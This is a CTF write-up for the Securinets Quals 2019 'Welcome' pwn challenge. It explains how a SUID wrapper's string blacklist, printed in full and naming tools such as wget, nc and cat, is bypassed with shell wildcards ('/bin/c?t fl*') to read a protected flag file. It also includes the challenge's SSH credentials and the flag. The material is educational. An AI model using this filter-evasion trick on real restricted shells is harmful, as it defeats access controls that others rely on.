Securinets CTF Quals 2019 — Welcome (Pwn) Write-Up
Challenge Description:
Unlike other CTFs we build a custom welcome for u \o/
Your goal is to execute welcome binary ssh welcome@51.254.114.246
password : bc09c4a0a957b3c6d8adbb47ab0419f7
This is a simple pwn challenge that I did enjoyed solving since it somehow test the basic knowledge on working on Linux shell commands in terminal.
On this pwn challenge, we are given a binary in which we could use to read the flag.
To get a gist of the challenge, below are its important parts.
If we check the user we are running as using id command, we can see that we have access to the machine as welcome user.
welcome@vps614257:~$ id
uid=1018(welcome) gid=1018(welcome) groups=1018(welcome)If we then check the files available on the user’s home directory. We can see that there is flag.txt but the problem is that the file is only readable by welcome-cracked user.
welcome@vps614257:~$ ls -al
total 56
dr-xr-xr-x 2 welcome welcome 4096 Mar 23 20:23 .
drwxr-xr-x 22 root root 4096 Mar 24 10:18 ..
-rw-r — r — 1 root root 0 Mar 25 11:24 .bash_history
-rw-r — r — 1 welcome welcome 0 Mar 24 00:22 .bash_logout
-rw-r — r — 1 welcome welcome 1 Mar 24 13:33 .bashrc
-r — — — — 1 welcome-cracked welcome-cracked 76 Mar 23 20:23 flag.txt
-rw-r — r — 1 welcome welcome 655 May 16 2017 .profile
-r — — — — + 1 welcome-cracked welcome 8712 Mar 23 19:09 welcome
-rw-r — — — 1 root root 175 Mar 23 12:27 welcome.c
-r-s — x — — 1 welcome-cracked welcome 13088 Mar 23 20:13 wrapper
-rw-r — r — 1 root root 1741 Mar 23 20:13 wrapper.cExamining the file, we can see that there is a wrapper file which has SUID (Set owner User ID up on execution) set to welcome-cracked user.
This means that the binary file will run with welcome-cracked user’s permission rather than welcome user.
-r-s — x — — 1 welcome-cracked welcome 13088 Mar 23 20:13 wrapperFrom the available files on the home directory there is also wrapper.c, which would be the source code of the wrapper binary file.
Let’s try to check it.
If you try to analyse the source code, what it does is just it waits for a user to enter a command, and then the command will be checked if there is any word or character that matches the blacklisted strings. If there is any character that matches the blacklisted strings then the said string will get deleted.
The idea in here is that we need to bypass the blacklisted strings.
Obviously common commands that are used to read a file are blacklisted.
char * blacklist[]={"cat","head","less","more","cp","man","scp","xxd","dd","od","python","perl","ruby","tac","rev","xz","tar","zip","gzip","mv","flag","txt","python","perl","vi","vim","nano","pico","awk","grep","egrep","echo","find","exec","eval","regexp","tail","head","less","cut","tr","pg","du","`","$","(",")","#","bzip2","cmp","split","paste","diff","fgrep","gawk","iconv","ln","most","open","print","read","{","}","sort","uniq","tee","wget","nc","hexdump","HOSTTYPE","$","arch","env","tmp","dev","shm","lock","run","var","snap","nano","read","readlink","zcat","tailf","zcmp","zdiff","zegrep","zdiff"};Also, take note that the flag and txt strings are also blacklisted and our target file to read is named as flag.txt.
So, how we are able to read a file if those strings are blacklisted??
Easy. 😉
We can just use wildcards.
Wildcards are commonly used in shell commands in Linux and other Unix-like operating systems. It is a character that can be used as a substitute for any of a class of characters.
For example, a question mark (?) can be used as a wildcard character in shell commands to represent exactly one character.
While a star wildcard — symbolised by an asterisk (*) — can represent all single characters or any string.
More about this can be read on how to use wildcards, by The Linux Information Project (LINFO) article.
Going back to the challenge, there are many ways of doing this but a common way of reading the flag.txt file would be using /bin/cat flag.txt command.
/bin/cat flag.txtObviously the command won’t work for us as it contains the strings cat, flag and txt which are blacklisted. So, if we apply wildcard, we can just use /bin/c?t fl* command.
/bin/c?t fl*Using the command on the challenge, resulted on reading the flag file.
welcome@vps614257:~$ ./wrapper
Welcome to Securinets Quals CTF o/
Enter string:
/bin/c?t fl*
securinets{who_needs_exec_flag_when_you_have_linker_reloaded_last_time!!!?}Flag is:
securinets{who_needs_exec_flag_when_you_have_linker_reloaded_last_time!!!?}We successfully bypassed the program’s commands restriction and read the flag.
